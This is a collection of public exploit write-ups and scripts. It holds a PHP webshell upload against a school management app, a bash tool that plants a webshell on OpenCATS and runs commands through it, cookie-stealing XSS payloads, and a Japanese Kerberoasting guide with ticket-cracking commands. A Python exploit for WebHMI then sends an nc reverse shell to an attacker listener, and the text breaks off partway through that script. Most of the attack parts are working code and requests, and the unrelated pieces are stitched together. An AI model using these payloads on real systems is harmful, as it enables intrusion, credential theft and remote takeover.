# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)
# Exploit Author: fuuzap1
# Date: 7-12-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Version: 1.0
# Tested on: windows
# Vulnerable page: http://localhost/admin/examQuestion
Technical description:
An unrestricted file upload vulnerability exists in the Free school
management software v1.0. An attacker can leverage this vulnerability in
order to get remote code execution on the affected web server. Once a php
webshell containing "<?php system($_GET["cmd"]); ?>" is uploaded, it is
saved into the /uploads/exam_question/ directory and is accessible to
all users, so the attacker gains remote code execution on the web server.
Steps to exploit:
1) Navigate to http://localhost/admin/manage_profile
2) click "ADD NEW QUESTION PAPER" and edit the basic information
3) upload a php webshell containing "<?php system($_GET["cmd"]); ?>" in
the field "upload Drag and drop a file here or click"
4) Click "save"
5) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() to
confirm php code execution
Proof of concept (Poc):
The following payload will allow you to run PHP code -
<?php system($_GET["cmd"]); ?>
---
POST /admin/examQuestion/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------183813756938980137172117669544
Content-Length: 1331
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/examQuestion
Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q
Upgrade-Insecure-Requests: 1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="name"
test4
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="class_id"
2
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="subject_id"
5
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="timestamp"
2021-12-08
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="teacher_id"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_type"
txt
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="status"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="description"
123123
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="_wysihtml5_mode"
1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_name"; filename="cmd.php"
Content-Type: application/octet-stream
<?php eval($_GET["cmd"]); ?>
-----------------------------183813756938980137172117669544--
---
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#!/bin/bash
# RevCAT: OpenCATS <= 0.9.4 file-upload -> code-execution PoC.
# The careers portal's "apply to job" form stores the uploaded resume under
# upload/careerportaladd/ with its original .php name and serves it from
# there; the rest of this script relies on exactly that. Server-side, the
# defence is an extension/MIME allowlist on the resume upload and a
# non-executable upload directory. On the wire the chain is a POST to
# onApplyToJobOrder carrying a .php resumeFile, followed by POSTs to
# upload/careerportaladd/<name>.php - a usable detection signature.
if [ $# -eq 0 ]
then
    echo "Usage: $0 <target URL>"
    exit
fi
# if a payload doesn't work, try another
# Every variant is prefixed with the GIF87a magic bytes, presumably to satisfy
# a content check on the server (TODO confirm); the prefix is stripped from
# responses again in rev() and in the shell check below.
payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'
target=$1
# ANSI colour escapes used in status output.
green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"
#====================== Functions
# Interactive command loop against the uploaded script at URL $1.
# Each line read from stdin is POSTed as form field "0" (the parameter the
# payload reads) and the reply is printed with the leading GIF87a prefix and
# the last line removed. Loops until interrupted; there is no exit command.
rev() {
    while true
    do echo -n -e "\n$ "
        read cmd
        curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
    done
}
# Submit local file $3 as a resume to $1/$2 (the onApplyToJobOrder handler).
# $1 base URL, $2 request path, $3 file to upload. Depends on the global
# $firstJb (job id scraped by the main flow) for the job being applied to;
# the part's MIME type is forced to application/x-php. Output is the raw
# response body, which the caller greps.
upload() {
    curl -skL $1/$2 \
        -H "Connection: close" \
        -F resumeFile=@"$3;type=application/x-php" \
        -F ID="$firstJb" \
        -F candidateID="-1" \
        -F applyToJobSubAction="resumeLoad" \
        --compressed \
        --insecure
}
# Best-effort version fingerprint of the CATS instance at $1.
# First scrapes a dotted version number out of a <span> on the front page,
# then falls back to installtest.php's "CATS version is X.Y.Z" text. Failure
# only prints a warning (return 0); nothing later in the script uses $ver.
# A reachable installtest.php on a production install is a finding on its own.
getVersion() {
    ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
    if [ -z "${ver}" ]
    then
        ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
        if [ -z "${ver}" ]
        then
            echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
            return 0
        fi
    fi
    echo -e "${green}[*] Version detected: $ver${reset}"
}
# Write payload $1 to a randomly named 5-character .php file in the current
# directory. Sets the globals $tmpfile (the path) and $file (its basename -
# identical here, since the name has no directory component) for the main flow.
writePayload(){
    tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
    file=`basename $tmpfile`
    echo "$1" > $tmpfile
}
# Print the base64-encoded ASCII-art banner, then a blank line.
banner(){
    echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
    echo -e "\n"
}
#======================
# Main flow: banner, version fingerprint, payload file, job discovery,
# upload, shell check, interactive loop.
banner
echo "[*] Attacking target $target"
echo "[*] Checking CATS version..."
getVersion $target
#exit
echo "[*] Creating temp file with payload..."
writePayload "$payload"
#exit
# Job discovery: fetch the public job list, scrape the "Posted Jobs: N" count
# and the first job id out of it; try /careers/ first and the site root as a
# fallback. A job id is needed because upload() applies to it.
echo "[*] Checking active jobs..."
jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
    echo -e "${red}[-] No active jobs found.${reset}"
    echo "[*] Trying another path..."
    jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
    numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
    if [[ ! $numJb -gt 0 ]]
    then
        echo -e "${red}[-] Couldn't find any active job.${reset}"
        exit
    fi
fi
# Re-scraped here so the fallback page's id wins when it was used.
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`
echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."
# Upload and look for the "will be uploaded" text or the file name in the
# reply. The `if ! \`...\`` form only works because bash falls back to the
# status of the command substitution when the expansion yields no command
# (egrep -q prints nothing). On failure the GIF87a prefix is removed from the
# file and the site-root path is tried once more.
req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
    echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
    echo "[*] Checking by another method..."
    sed -i "s/GIF87a//" $tmpfile
    req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`
    if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
    then
        echo -e "${red}[-] Couldn't upload payload...${reset}"
        exit
    fi
fi
# Colour is not reset on this line (no ${reset}).
echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
# Liveness check: POST a marker command and look for its output, then hand
# over to rev(). Every request from here on is a POST with a "0=" body to
# upload/careerportaladd/<5 chars>.php, which is what server-side monitoring
# should key on.
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
    echo -e "${green}[+] Got shell! :D${reset}"
    curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
    rev $target/upload/careerportaladd/$file
else
    echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi
# Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: fuzzyap1
# Date: 7-12-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Version: 1.0
# Tested on: windows
# Vulnerable page: http://localhost/admin/enquiry_category
# Vulnerable Parameters: "category"
Technical description:
A stored XSS vulnerability exists in the Event management software. An
attacker can leverage this vulnerability in order to run JavaScript in the
browsers of users visiting the site, which can lead to cookie stealing,
defacement and more.
Steps to exploit:
1) Navigate to http://localhost/admin/enquiry_category
2) Insert your payload in the "category" parameter
3) Click "save"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert(document.cookie)>
---
POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------151631281127875309002088019539
Content-Length: 490
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/enquiry_category
Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;
ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0
Upgrade-Insecure-Requests: 1
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="category"
This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)>
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="purpose"
Payment
-----------------------------151631281127875309002088019539
Content-Disposition: form-data; name="whom"
Tutorial
-----------------------------151631281127875309002088019539--
---
Steps to exploit:
1) Navigate to http://localhost/admin/manage_profile
2) Insert your payload in the "name" parameter
3) Click "save"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert('xss')>
---
POST /admin/manage_profile/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------13285163425854907563979323722
Content-Length: 519
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/manage_profile
Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16
Upgrade-Insecure-Requests: 1
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="name"
Administrator"><img src=# onerror=alert(document.cookie)>
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="email"
admin@admin.com
-----------------------------13285163425854907563979323722
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------13285163425854907563979323722--
---
0x01 SPN定義
サービスプリンシパル名(SPN)は、特定のKerberosターゲットコンピューターを独自に識別するためにKerberosクライアントが使用するサービスインスタンス名です。 Kerberos AuthenticationはSPNを使用して、サービスインスタンスをサービスログインアカウントに関連付けます。森林全体のコンピューターに複数のサービスインスタンスがインストールされている場合、各インスタンスには独自のSPNが必要です。クライアントが複数の名前で認証できる場合、特定のサービスインスタンスには複数のSPNを持つことができます。たとえば、SPNには常にサービスインスタンスを実行するホスト名が含まれているため、サービスインスタンスはホストの各名前またはエイリアスのSPNを登録できます。
0x02 SPNスキャン
SPNスキャンは、Kerberosサービスインスタンス名をスキャンすることもできます。アクティブなディレクトリ環境でサービスを発見する最良の方法は、「SPNスキャン」を使用することです。特定のSPNタイプのサービスプリンシパル名を要求してサービスを見つけることにより、ネットワークポートスキャンを介したSPNスキャン攻撃者の主な利点は、SPNスキャンでは、ネットワークに接続された各IPがサービスポートを確認する必要がないことです。 SPNスキャンは、LDAPクエリを介してドメインコントローラーにサービスの発見を実行します。 SPNクエリは通常のKerberosチケットの一部であるため、クエリを使用できない場合は、ネットワークポートスキャンで確認できます。
1.SPNフォーマット
spn=serviceclass "/" hostname [":" port] ["/" serviceName]
ServiceClass=MSSQL
servicename=sql.bk.com
で:
ServiceClass: Webサービスのwwwなどのサービスクラスの文字列を識別します
HOSTNAME:文字列はシステムの名前です。これは、完全に適格なドメイン名(FQDN)である必要があります。
PORT:番号はサービスのポート番号です。
ServicEname:サービスの著名な名前(DN)、ObjectGuid、インターネットホスト名、または完全に適格なドメイン名(FQDN)である文字列。
注:サービスクラスとホストが必要なパラメーターですが、ポートとサービス名はオプションです。ホストとポートの間のコロンは、ポートが存在する場合にのみ必要です。
2。一般的なサービスとSPNサービスインスタンス名
mssqlsvc/adsmssqlap01.adsecurity.org:1433
交換
Exchangemdb/adsmsexcas01.adsecurity.org
RDP
TERMSRV/adsmsexcas01.adsecurity.org
WSMAN/WINRM/PSリモート
wsman/adsmsexcas01.adsecurity.org
Hyper-Vホスト
Microsoft Virtual Console Service/adsmshv01.adsecurity.org
vmware vcenter
sts/adsmsvc01.adsecurity.org
2。 SPNスキャンPSスクリプト
MSSQLサービスでSPNサービスインスタンスの名前を発見してください。
https://github.com/pyrotek3/powershell-ad-recon/blob/master/discover-psmssqlservers
他のSPNサービスインスタンス名クエリ:
https://github.com/pyrotek3/powershell-ad-recon
各サーバーはKerberos認証サービスにSPNを登録する必要があるため、これはポートスキャンを実行せずに環境に関する情報を収集するのに最適な方法を提供します。
例えば:
管理者は、「MetCorpKCS17」という名前のサーバーにMicrosoft SQL Serverをインストールおよび構成し、ポート3170および3171で待ち受けるSQLインスタンスを使用します。
その後、サービスクラスとインスタンス名は次のように生成されます。
MSSQLSVC/METCORPKCS17.ADSECURITY.org:3170
MSSQLSVC/METCORPKCS17.ADSECURITY.org:3171
青い部分はサービスクラス、オレンジ色の部分はコンピューターのFQDN、緑の部分はネットワークポート番号です。KerberosはSPN要求がディレクトリの既存のSPNに一致するため、最後の番号は必ずしもサーバー上のポートではありません。上記のように、ほとんどの場合、SPNに記録されたポートはサーバー上のリスニングポートであり、すべてのSPNがポートを含むわけではありません。これで、Active DirectoryドメインまたはフォレストでSQLサーバーを発見するためのより良い方法があります。ServicePrincipalName=MSSQL*
0x03
SPNスキャンとクラッキングTGSチケットはMSSQLサービスを使用してSPNを例として構成します
参照構成アドレス:
https://technet.microsoft.com/zh-cn/library/bb735885.aspx
1。SQLの場合
サーバーサービスアカウント登録SPN
手動登録:
setSpn -a mssqlsvc/myhost.redmond.microsoft.com:1433 accountname
対応する名前のインスタンス:
setSpn -a mssqlsvc/myhost.redmond.microsoft.com/instancename accountname
2。ユーザーに対応するSPNを確認します。
setspn -l ruos\sql-service
3. ADSI(ADSIEDIT.MSC)を使用して、ユーザー属性を表示します
4.広告のユーザーにサービスログイン権限を指定します。
gpo_name \ computer
Configuration \ Windows Settings \ Security Settings \ Local Policies \ User Rights
割り当て
サービスとしてログオンします
5 .変更
SQL Server Serviceアカウントはドメインユーザーアカウントです
6。ブルートフォースケルベロス
TGSチケット
暗号化タイプはRC4_HMAC_MD5であるため、Kerberos Protocol TGS-REPの4番目のステップは、サービスアカウントのNTLMパスワードで暗号化されたチケットを返します。
7.SPNスキャン
setspn -t ドメイン -Q */*
または
https://github.com/pyrotek3/powershell-ad-recon/
8。spnをリクエストします
Kerberosのチケット
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'mssqlsvc/webtst01.ruos.org/sqlexpress'
9。チケットを表示およびエクスポートします
デフォルトの構成暗号化タイプはAES256_HMACであり、TGSREPCRACKをクラックできません。サーバーグループポリシーで暗号化タイプをRC4_HMAC_MD5として指定できます。
gpo_name \ computer configuration \ windows settings \ security settings \ local
ポリシー\セキュリティオプション
Network Security: Kerberosに許可される暗号化タイプを構成します
10。オフラインのひび割れ
TGSREPACK(RC4_HMAC_MD5のみ)、またはハッシュカットを使用してハッシュを保存してクラックします。
ハッシュをエクスポートする(他の暗号化タイプ用)
getUserSpns.py -Request -OutputFile hash.txt -dc-ip 192.168.6.2 ruos.org/user2
または、請求書からkirbi2john.pyをエクスポートします
1-40A00000-USER2@MSSQLSVC~webtst01.ruos.org~sqlexpress-ruos.org.kirbi
S2。 hashcat64.exe -m 13100 hash.txt emple.dict –force
次のように他のひび割れツールを参照することもできます。
https://github.com/nidem/kerberoast
https://github.com/coresecurity/impacket
https://github.com/nidem/kerberoast/blob/master/kirbi2john.py
0x04
Active Directoryサービスの包括的な参照テーブルプリンシパル名(SPN)Acronisagent:Acronisバックアップおよびデータ回復ソフトウェア用
Adtserver:ACSを備えたMicrosoftシステム
センターオペレーションマネージャー(2007/2012)管理サーバー
Afpserver:Appleアーカイブプロトコル
AGPMSERVER:Microsoft Advanced Group Policy Management(AGPM)
aradminsvc-タスクマスターロールサーバー
ARSSVC-タスクマスターロールサーバー
BOCMS:コマーシャルCMS
BOSSO:ビジネスオブジェクト
CESREMOTE:VMware上のCitrix VDIソリューションに関連して、多くのVDIワークステーションにはこのSPNがあります。
CIFS:ユニバーサルインターネットファイルシステム
CMRCService:Microsoft System Center Configuration Manager(SCCM)リモートコントロール
CusessionKeysVr:Cisco Unity VoIPシステム
CVS:CVSライブラリ
DFSR *:分散ファイルシステム
DNS:ドメイン名サーバー
E3514235-4B06-11D1-AB04-00C04FC2DCD2:NTDS DC RPCコピー
E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAM:Adam Instance
EDVR:ExacqVision Service
ExchAngeAB:アドレス帳サービスを交換(通常はNSPI、通常はすべてのGCをサポートするドメインコントローラー)
ExchangemDB:RPCクライアントアクセスサーバーの役割
Exchangerfr:アドレス帳サービスを交換します
FCSVR:Apple Final Cut Server
filerepservice:wsfilerepservice.exe
FimService:Microsoft
最前線の識別マネージャー(FIM)
FTP:ファイル転送プロトコル
GC:ドメインコントローラーグローバルカタログサービス
HDFS:Hadoop(Ambari)
ホスト:ホストサービスはホストを表します。ホストSPNは、サービスチケットの作成時にKerberosプロトコルによって長期キーを使用するホストアカウントにアクセスするために使用されます。
HTTP:Kerberos認証をサポートするHTTPネットワークサービスのSPN
Hyper-Vレプリカサービス:Microsoft Hyper-Vレプリカサービス
IMAP:インターネットメッセージアクセスプロトコル
IMAP4:インターネットメッセージアクセスプロトコルバージョン4
IPP:インターネット印刷プロトコル
ISCSITARGET:ISCSI構成
Kadmin:Kerberos
LDAP:ドメインコントローラーやAdamインスタンスなどのLDAPサービス。
MAGFS:Maginatics Magfs
MapRed:Cloudera
Microsoft Virtual Consoleサービス:HyperVホスト
Microsoft Virtual System Migration Service:P2Vサポート(Hyper-V)
Mongod:Mongodb Enterprise
Mongos:Mongodb Enterprise
MSClusterVirtualServer:Windowsクラスターサーバー
MSOLAPSVC:SQL Server Analysis Service
MSOLAPSVC.3:SQL Server Analysis Service
MSOLAPDISCO.3:SQL Server Analysis Service
MSOMHSVC:Microsoft System Center Operations Manager(2007/2012)管理サーバー
MSOMSDKSVC:Microsoft System
センターオペレーションマネージャー(2007/2012)管理サーバー
MSSERVERCLUSTER:Windowsクラスターサーバー
MSSERVERCLUSTERMGMTAPI:このクラスターAPIでは、このSPNにKerberosを使用してサーバーに認証する必要があります
MSSQL:Microsoft SQL
サーバ
MSSQLSVC:Microsoft SQL
サーバ
MSSQL $ ADOBECONNECT:Adobe ConnectをサポートするMicrosoft
SQL Server
MSSQL $ BIZTALK:Microsoft SQL
サーバーはMicrosoftをサポートします
biztalkサーバー
MSSQL $ BusinessObjects:ビジネスオブジェクトをサポートするMicrosoft
SQL Server
MSSQL $ DB01NETIQ:NETIQをサポートするMicrosoft SQL
サーバ
NFS:ネットワークファイルシステム
Nppolicyevaluator:Dell Quest監査人
Nprepository 4(Changeauditor):Dell Quest Change
監査人
NPREPOSITORY4(CAAD):Dell Quest監査人
NPREPOSITORY4(デフォルト):Dell Task Auditor
NTFRS *:NTファイルコピーサービス
Oracle:Oracle Kerberos認証
Pcast:Apple Podcastプロデューサー
PCNSCLNT:自動パスワード同期ソリューション(MIIS 2003&FIM)
POP:電子メールプロトコル(Post Office Protocol)
POP3:電子メールプロトコルバージョン3
PVSSOAP:Citrix
プロビジョニングサービス(7.1)
制限付きkrbhost:サービスクラスの文字列が「restrictedkrbhost」に等しいSPNを使用するサービスクラス。サービスバウチャーはコンピューターアカウントキーを使用してセッションキーを共有します。
RPC:リモートプロシージャコールサービス
SAP:SAP/SAPSERVICE
シド
SAS:SASサーバー
SCVMM:システムセンター仮想マシンマネージャー
Secshd:IBM Infosphere
SIP:セッションスタートアッププロトコル
SMTP:単純なメール転送プロトコル
SMTPSVC:単純なメール転送プロトコル
SoftGrid:Microsoftアプリケーション仮想化(APP-V)以前は「SoftGrid」
STS:VMware SSOサービス
SQLAGENT $ DB01NETIQ:SQL Service for Netiq
Tapenego:Microsoftファイアウォール(ISA、TMGなど)などのルーティングアプリケーションに関連付けられています。
TERMSRV:Microsoftリモートデスクトッププロトコルサービス、ターミナルサービスとしても知られています。
TNETD:Juniper Kerberos認証
「TNETDは、ルーティングエンジンやパケット転送エンジンなどのさまざまなコンポーネント間の内部通信に使用されるデーモンです」
VMRC:Microsoft Virtual Server 2005
VNC:VNCサーバー
VPN:仮想プライベートネットワーク
VPRORECOVERY BACKUP Exec System Recovery Agent 7.0
VPRORECOVERY BACKUP Exec System Recovery Agent 8.0
VPRORECOVERYバックアップEXECシステム回復エージェント9.0
vProrecovery Norton Clone Proxy 12.0
vprorecoverynorton
クローンプロキシ14.0VPRORECOVERY NORTON CLONE Proxy 15.0
VProRecovery Symantec System Recovery Agent 10.0
VProRecovery Symantec System Recovery Agent 11.0
VProRecovery Symantec System Recovery Agent 14.0
vssrvc: Microsoft Virtual Server (2005)
WSMAN:Windowsリモート管理(WS管理標準に基づく)サービス
XMPP/XMPP:拡張可能なメッセージとレンダリングプロトコル(Jabber)
Xgrid:Appleの分散(グリッド)計算/
Mac OS X 10.6サーバー管理
YARN:Cloudera
MapReduce
注:ドメインコントローラーは、パブリックSPNをホストSPNに自動的にマッピングします。コンピューターがドメインに結合されると、ホストSPNはすべてのコンピューターアカウントのServicePrincipalNameプロパティに自動的に追加されます。ドメインコントローラーSPNマッピングは、SPNMAppingsのプロパティによって制御されます。
「CN=ディレクトリ
サービス、cn=windowsnt、cn=services、cn=configuration
SPNは自動的にホスト(SPNMAPPING属性値):Alerterにマッピングされます
appmgmt
CISVC
Clipsrv
ブラウザ
DHCP
dnscache
レプリケーター
eventlog
Eventsystem
PolicyAgent
oakley
dmserver
DNS
MCSVC
ファックス
msserver
IAS
メッセンジャー
Netlogon
ネットマン
netdde
netddedsm
nmagent
プラグプレイ
ProtectedStorage
ラスマン
rpclocator
RPC
RPCSS
RemoteaCcess
rsvp
samss
scandsvr
SSRV
Seclogon
SCM
DCOM
CIF
スプーラ
SNMP
スケジュール
tapisrv
trksvr
trkwks
UPS
時間
wins
www
http
W3SVC
iisadmin
MSDTC
# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://webhmi.com.ua/en/
# Version: WebHMI Firmware < 4.1
# CVE: CVE-2021-43936
# Tested on: WebHMI Firmware 4.0.7475
#!/usr/bin/python
import sys
import re
import argparse
import pyfiglet
import requests
import time
import subprocess
# Banner and run-time constants. The credentials below are sent in the
# X-WH-LOGIN / X-WH-PASSWORD headers by Exploit.exploitation(); the chain is
# authenticated, so default or weak admin credentials are its precondition.
banner = pyfiglet.figlet_format("CVE-2021-43936")
print(banner)
print('Exploit for CVE-2021-43936')
print('For: WebHMI Firmware < 4.1')
login = "admin" #CHANGE ME IF NEEDED
password = "admin" #CHANGE ME IF NEEDED
class Exploit:
    """Authenticated upload-to-execution chain for WebHMI firmware < 4.1 (CVE-2021-43936).

    Sequence, as implemented in exploitation(): GET the base URL, POST
    /api/signin with the module-level ``login``/``password`` in X-WH-* headers,
    replay the X-WH-SESSION-ID response header as a cookie on /login.php,
    upload ``cmd.php`` through /files.php, then request /uploads/files/cmd.php
    with a command in the ``cmd`` query parameter.
    Root cause: /files.php stores a .php upload under the web root without
    validating extension or type. Server-side fix is an upload allowlist plus
    a non-executable upload location; the request pair above (an upload
    named *.php followed by a GET of it carrying a ``cmd`` parameter) is the
    pattern to alert on.
    """

    def __init__(self, target_ip, target_port, localhost, localport):
        # Target address, and the listener address the shell connects back to.
        self.target_ip = target_ip
        self.target_port = target_port
        self.localhost = localhost
        self.localport = localport

    def exploitation(self):
        """Run the full chain; blocks on the netcat listener on success.

        Reads the module-level globals ``login``, ``password``, ``target_ip``,
        ``target_port``, ``localhost`` and ``localport`` rather than the
        attributes set in __init__ (they hold the same values when driven from
        the bottom of this file). Raises KeyError if /api/signin returns no
        X-WH-SESSION-ID header (presumably a rejected login).
        """
        payload = """<?php system($_GET['cmd']); ?>"""
        # URL-encoded reverse-shell command that cmd.php hands to system();
        # NOTE(review): built from the module globals, not self.localhost/port.
        payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
        headers_login = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/json',
            'X-WH-LOGIN': login,
            'X-WH-PASSWORD': password,
            'X-Requested-With': 'XMLHttpRequest',
            'Connection': 'close',
            'Content-Length': '0'
        }
        url = 'http://' + target_ip + ':' + target_port
        r = requests.Session()
        print('[*] Resolving URL...')
        r1 = r.get(url)
        time.sleep(3)  # fixed pauses between steps; no response is checked until r5
        print('[*] Trying to log in...')
        r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
        time.sleep(3)
        print('[*] Login redirection...')
        # The session id arrives as a response header and is replayed as a cookie.
        login_cookies = {
            'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
            'X-WH-CHECK-TRIAL':'true',
            'il18next':'en',
        }
        r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
        time.sleep(3)
        print('[*] Uploading cmd.php file...')
        files = {
            'file': ('cmd.php', payload, 'application/x-php')
        }
        r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)
        time.sleep(3)
        print('[*] Setting up netcat listener...')
        # Listener is started only after the upload; uses self.localport here
        # while payload2 above used the global.
        listener = subprocess.Popen(["nc", "-nvlp", self.localport])
        time.sleep(3)
        print('[*] Executing reverse shell...')
        print('[*] Watchout for shell! :)')
        r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)
        if (r5.status_code == 200):
            print('[*] Got shell!')
            # wait() returns once nc exits, after which this spins forever;
            # Ctrl-C is the only way out.
            while True:
                listener.wait()
        else:
            print('[-] Something went wrong!')
            listener.terminate()
def get_args():
    """Parse the four required CLI options and return the argparse namespace.

    Attributes on the result: ``url`` (target IP), ``target_port``,
    ``localhost`` (listener IP) and ``localport`` (listener port), all as
    strings. argparse exits with a usage message if any is missing.
    """
    parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')
    parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
